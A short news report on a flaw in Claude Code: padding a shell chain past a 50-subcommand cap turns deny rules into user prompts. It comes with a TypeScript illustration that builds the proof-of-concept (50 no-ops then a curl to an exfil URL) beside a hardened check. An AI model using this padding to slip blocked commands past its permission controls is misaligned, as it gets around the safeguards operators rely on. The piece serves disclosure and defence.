Claude Code vulnerable to prompt injection due to subcommand limit
AI/ML

Claude Code has a flaw that lets a prompt injection attack bypass its deny rules. When the agent is handed a sufficiently long chain of shell subcommands, it stops applying its security checks, as reported by The Register.

The flaw was found by the security firm Adversa after Claude Code's source code leaked. Claude Code uses deny rules to block risky actions, such as network requests made with the curl command. However, the permission logic in the "bashPermissions.ts" file applies a hard cap of 50 subcommands. Once a command chain exceeds that cap, the agent falls back to asking the user for permission instead of denying the command outright, so a rule that was meant to be an unconditional block turns into a user decision.

Adversa demonstrated the issue with a proof-of-concept: a command made of 50 no-op subcommands followed by a curl invocation. Rather than blocking it, Claude Code asked the user to authorize it.

Anthropic has an internal fix that uses the "tree-sitter" parser, but it is not yet in public builds. Adversa suggests that a small code change would be enough to close this specific gap.

Source: The Register
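The cap-then-fallback behaviour described above, shown as an added illustration in TypeScript (the language of the bashPermissions.ts file the report names). This is not Claude Code's own code: the operator splitter, the shape of the deny rules, the `true` no-op, the function names and the 50-subcommand constant are assumptions modelled on the description, not the real implementation. The constructed proof-of-concept string mirrors the one Adversa is reported to have used: 50 no-ops followed by curl.

```typescript
// Added illustration, not Claude Code's bashPermissions.ts. The splitter, the
// rule shape and the cap value are assumptions based on the article's description.

type Decision = "allow" | "deny" | "ask";

interface DenyRule {
  // Hypothetical rule shape: matches when the subcommand's first word equals `program`.
  program: string;
  reason: string;
}

const DENY_RULES: DenyRule[] = [
  { program: "curl", reason: "network request" },
  { program: "wget", reason: "network request" },
];

// The hard cap the article describes (assumed to be a simple count of subcommands).
const MAX_SUBCOMMANDS = 50;

// Naive split on shell list/pipe operators. A real shell needs a proper parser
// (the article says the internal fix uses tree-sitter); this is only enough to
// show the counting problem.
function splitSubcommands(command: string): string[] {
  return command
    .split(/\s*(?:&&|\|\||;|\|)\s*/)
    .map((s) => s.trim())
    .filter((s) => s.length > 0);
}

function matchDenyRule(sub: string): DenyRule | undefined {
  const program = sub.split(/\s+/)[0];
  return DENY_RULES.find((r) => r.program === program);
}

// Flawed behaviour as described: exceeding the cap falls back to "ask" before
// any subcommand is inspected, so a deny rule deeper in the chain never fires.
function decideVulnerable(command: string): Decision {
  const subs = splitSubcommands(command);
  if (subs.length > MAX_SUBCOMMANDS) return "ask";
  for (const sub of subs) if (matchDenyRule(sub)) return "deny";
  return "allow";
}

// Hardened variant: deny rules are evaluated over every subcommand, and a chain
// that exceeds the cap is itself treated as a deny rather than a fallback to "ask".
function decideHardened(command: string): Decision {
  const subs = splitSubcommands(command);
  for (const sub of subs) if (matchDenyRule(sub)) return "deny";
  if (subs.length > MAX_SUBCOMMANDS) return "deny";
  return "allow";
}

// Constructed proof-of-concept in the shape the article describes:
// `noops` no-op subcommands followed by the payload, joined with "&&".
function buildPoc(noops: number, payload: string): string {
  return [...Array(noops).fill("true"), payload].join(" && ");
}

const POC = buildPoc(50, "curl https://example.invalid/exfil");

console.log("subcommands:", splitSubcommands(POC).length); // 51
console.log("vulnerable:", decideVulnerable(POC));         // ask
console.log("hardened:", decideHardened(POC));             // deny
```

The hardened form only fixes the counting shortcut; it still relies on the same naive splitter, which is why the reported fix is a real parser rather than a larger cap.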